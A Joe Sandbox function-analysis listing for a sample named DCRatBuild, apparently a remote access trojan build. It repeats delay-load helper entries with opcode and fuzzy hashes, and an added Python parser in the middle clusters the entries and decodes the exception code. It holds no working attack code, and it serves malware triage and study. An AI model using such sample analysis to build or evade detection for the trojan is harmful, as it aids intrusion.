                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 5711af5aa27f54be694b53e890efafd97ae88d68869f0392ab93815aeaa8bde1
                                                                                                                        • Instruction ID: fdd5811f127d9e33123f43e34c0dcf9f4e2807668ac0e26737da97e2985640b6
                                                                                                                        • Opcode Fuzzy Hash: 5711af5aa27f54be694b53e890efafd97ae88d68869f0392ab93815aeaa8bde1
                                                                                                                        • Instruction Fuzzy Hash: 50B012E925C114FC3144614B1DC2E37010CC1D6B11330803FF829C1080D84CAC01053E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: 977890e3fdc994f04c7ae24077413d0885e39d28542c527ac3b406af0c80caa1
• Instruction ID: 936b5627cad154f46c6cfc27f673fbf4467b40ef0dccf211505536be6a02ffb5
• Opcode Fuzzy Hash: 977890e3fdc994f04c7ae24077413d0885e39d28542c527ac3b406af0c80caa1
• Instruction Fuzzy Hash: DDB012E6258010FC318466071D82E37110CC1D7B11330C03FFC29C1180D94CEC05043E
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: bbdfa69825a9b478f9fbafcc5458d4841aeea8b64543571aec70422c8813d122
                                                                                                                        • Instruction ID: faa2a17d282a65b7e64d02958a6adfc824d13c5e388f23052b69dc58be1c10e8
                                                                                                                        • Opcode Fuzzy Hash: bbdfa69825a9b478f9fbafcc5458d4841aeea8b64543571aec70422c8813d122
                                                                                                                        • Instruction Fuzzy Hash: 1FB092A5258010BC314465075982E37110CC197B11330802FF829C1080984CA901043A
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 2c67db983abc739fb056b49d4f3f3212818f39dde6a90e1528f49972ae567188
                                                                                                                        • Instruction ID: 1729fc63a270b190ebf16586dbccc0204ae7b1b616e9e531e0b7d6ef64263f2b
                                                                                                                        • Opcode Fuzzy Hash: 2c67db983abc739fb056b49d4f3f3212818f39dde6a90e1528f49972ae567188
                                                                                                                        • Instruction Fuzzy Hash: 8EB012F5258110FC318465075D82E37010CC1D7F11330813FF829C1080D84CAD41043E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 870fc307928b4b47672e9462a63d9ca566d31c3b3c3aa3b2445c04cb221ea6f0
                                                                                                                        • Instruction ID: 73dcaf186fd5ee304111d2e1c46cd0fb7101b9e020bc90b293305e50d76b50a4
                                                                                                                        • Opcode Fuzzy Hash: 870fc307928b4b47672e9462a63d9ca566d31c3b3c3aa3b2445c04cb221ea6f0
                                                                                                                        • Instruction Fuzzy Hash: 9BB012F5258010FC314465075D82E37010CC1D7F11330803FF829C1080D84CAD01043E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: f6a45f85f4eb1a3c93a07b9a35e7809bc21f9525435b16b99f2eb4ae00c68e10
                                                                                                                        • Instruction ID: 1f9afdf21779866fc984463c07adf563169f2b1b6b3bdb53e02c2936c53bdac6
                                                                                                                        • Opcode Fuzzy Hash: f6a45f85f4eb1a3c93a07b9a35e7809bc21f9525435b16b99f2eb4ae00c68e10
                                                                                                                        • Instruction Fuzzy Hash: 55B012F5258010FC314465075E82E37010CC1D7F11330803FF829C1084DC4CAE02043E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AEAF9
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: 3Ro
                                                                                                                        • API String ID: 1269201914-1492261280
                                                                                                                        • Opcode ID: 7bb967eb2b45ea5c22760991a288b2a4af50cdfa52b990e80b3776ef7765726f
                                                                                                                        • Instruction ID: e5dd5fbcf1fa33e690d8f373d9e9f4929e4569238a6ab5143847fda2ab0dab03
                                                                                                                        • Opcode Fuzzy Hash: 7bb967eb2b45ea5c22760991a288b2a4af50cdfa52b990e80b3776ef7765726f
                                                                                                                        • Instruction Fuzzy Hash: 97B012CA39A0427C310472071E42D37010CC1E2B95330C02FF524C40C5DC8C0C02043E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 18ab0966b77487b4ccb56e3491455a45eb776b622e8fbf1b394576ac9367afe4
                                                                                                                        • Instruction ID: b25e9d272ab7e0df187f40011037f5bdfbbc3bc762cad9c91699de136a67b537
                                                                                                                        • Opcode Fuzzy Hash: 18ab0966b77487b4ccb56e3491455a45eb776b622e8fbf1b394576ac9367afe4
                                                                                                                        • Instruction Fuzzy Hash: 14B012F5258010FC3144A1071E82E37018CC1D6B11330803FF829C1080DC4CED02043E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: 6383772b2da121cfca3b0169e27da531277e6c1807d00c948b65cca1ff3460bd
                                                                                                                        • Instruction ID: c4e6f96ed46a7637804b5871fd09c1640a4558e8eb1af71c5379f9556f8cc3d2
                                                                                                                        • Opcode Fuzzy Hash: 6383772b2da121cfca3b0169e27da531277e6c1807d00c948b65cca1ff3460bd
                                                                                                                        • Instruction Fuzzy Hash: 5BB012C5B591007C3244714B6D03E3B050CC1D7F1D330822FF428C1084EC4C0C45043E
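Every entry in this part of the listing routes through the CRT delay-load helper (`___delayLoadHelper2@8` in DELAYIMP) and carries the same `RaiseException.KERNEL32(C06D0057, ...)` subcall; only the Opcode ID, Instruction ID and fuzzy hashes change from entry to entry, and a few entries differ in their `API String ID`. The script below is an added example, not code from the Joe Sandbox report or from Joe Security's tooling: it parses this plain-text entry layout, groups entries by `API String ID` so that the repeated helper thunks collapse into one bucket, and decodes the status code's severity, facility and error fields. The facility value 0x6D and the three error names are the standard delayimp.h / winerror.h constants; `SAMPLE` is constructed from three of the entries above, trimmed to the lines the parser needs.

```python
"""Parse Joe Sandbox function entries and cluster them by their similarity IDs.

Added example, not part of the Joe Sandbox report. SAMPLE below is constructed
from three entries of the listing (trimmed); the parser handles the full layout.
"""
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• <name>.<module>[(args)], ref: <addr>", optionally prefixed with the subcall marker
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<name>[^.\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")  # "• Key: value" lines
# delayimp.h's VcppException() ORs facility 0x6D into the status; low 16 bits are a Win32 error
FACILITY_VISUALCPP = 0x6D
WIN32_NAMES = {0x57: "ERROR_INVALID_PARAMETER", 0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND"}

ApiCall = namedtuple("ApiCall", "name module args ref parent")  # parent: subcall function, or None


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)     # ApiCall objects in listing order
    strings: list = field(default_factory=list)  # referenced strings (often empty in the report)
    fields: dict = field(default_factory=dict)   # "Source File", "Opcode ID", "API String ID", ...


def parse_report(text):
    """Split the listing at each 'APIs' header and build one FunctionEntry per block."""
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":  # every entry opens with its APIs section
                current = FunctionEntry()
                entries.append(current)
            section = line
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if section == "APIs" and m:
            current.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["parent"]))
        elif section == "Strings":
            current.strings.append(line.lstrip("• ").strip())
        else:
            m = FIELD_RE.match(line)
            if m:
                current.fields[m["key"]] = m["val"]
    return entries


def decode_exception_code(hex_code):
    """Split an NTSTATUS-style code (RaiseException's first argument) into its bit fields."""
    code = int(hex_code, 16)
    info = {"severity": code >> 30, "facility": (code >> 16) & 0x0FFF, "code": code & 0xFFFF}
    if info["facility"] == FACILITY_VISUALCPP:
        info["win32_name"] = WIN32_NAMES.get(info["code"], "unknown")
    return info


def raise_codes(entry):
    """Decode the status passed to every RaiseException call listed under this entry."""
    return [decode_exception_code(c.args.split(",")[0])
            for c in entry.apis if c.name == "RaiseException" and c.args]


def cluster_by_api_string_id(entries):
    """Group Opcode IDs by 'API String ID': same API/string profile, different instruction bytes."""
    groups = defaultdict(list)
    for e in entries:
        groups[e.fields.get("API String ID")].append(e.fields.get("Opcode ID"))
    return dict(groups)


SAMPLE = """APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: bbdfa69825a9b478f9fbafcc5458d4841aeea8b64543571aec70422c8813d122
• Instruction ID: faa2a17d282a65b7e64d02958a6adfc824d13c5e388f23052b69dc58be1c10e8
• Instruction Fuzzy Hash: 1FB092A5258010BC314465075982E37110CC197B11330802FF829C1080984CA901043A
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Similarity
• String ID: J
• API String ID: 1269201914-200179588
• Opcode ID: 2c67db983abc739fb056b49d4f3f3212818f39dde6a90e1528f49972ae567188
• Instruction Fuzzy Hash: 8EB012F5258110FC318465075D82E37010CC1D7F11330813FF829C1080D84CAD41043E
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AEAF9
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Similarity
• String ID: 3Ro
• API String ID: 1269201914-1492261280
• Opcode ID: 7bb967eb2b45ea5c22760991a288b2a4af50cdfa52b990e80b3776ef7765726f
• Instruction Fuzzy Hash: 97B012CA39A0427C310472071E42D37010CC1E2B95330C02FF524C40C5DC8C0C02043E
"""
```

Running `cluster_by_api_string_id(parse_report(SAMPLE))` yields two buckets: the two `004AE1E3` thunks under `1269201914-200179588` and the `004AEAF9` one under `1269201914-1492261280`. `decode_exception_code("C06D0057")` gives severity 3 (error), facility 0x6D and code 0x57, i.e. `ERROR_INVALID_PARAMETER`, the status delayimp's helper raises for a rejected delay-load descriptor (0x7E and 0x7F would be the module-not-found and export-not-found cases). For triage this marks these entries as CRT helper boilerplate, so the fuzzy hashes worth comparing across samples are the ones that do not share this API/string profile.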
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: ce8f1ffe534b8cd2b1399fdc30a7bef7d4e74f2ca6d869d9af26cbcb13d1e30a
                                                                                                                        • Instruction ID: 8833afda92ec8463508864170c3ef86111c7c271e18db1f4158f363fdc67adff
                                                                                                                        • Opcode Fuzzy Hash: ce8f1ffe534b8cd2b1399fdc30a7bef7d4e74f2ca6d869d9af26cbcb13d1e30a
                                                                                                                        • Instruction Fuzzy Hash: B5B012C5B5A0007C310431672D06E3B010CC1D3F1D330803FF534C0485AC4C4D05043E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: 143a726b39b393d483d70884a666087891c2efe6d0b7e8e7ac2c557f0acb2b5b
                                                                                                                        • Instruction ID: 3cb79207efbb62435487e60ae3a9deb6df7adb225bf5733fa946433ac7153a08
                                                                                                                        • Opcode Fuzzy Hash: 143a726b39b393d483d70884a666087891c2efe6d0b7e8e7ac2c557f0acb2b5b
                                                                                                                        • Instruction Fuzzy Hash: 9CB012C5B580047D324861972E02E37010CC1D6B19330842FF428C20C0E84C0C01053E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: 6b8aceb01ca883b3e85b8311583c4edc3dad3c230a120af2c5c2beba4042a7e7
                                                                                                                        • Instruction ID: 06e09bacbcd3b91866378ffb490aa5ece71c4cecd2d102af89fad9f2d692ca80
                                                                                                                        • Opcode Fuzzy Hash: 6b8aceb01ca883b3e85b8311583c4edc3dad3c230a120af2c5c2beba4042a7e7
                                                                                                                        • Instruction Fuzzy Hash: AEB012C5B580007C314861976F02E37011CC1D6B19330862FF428C2080EC4C0D12053E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
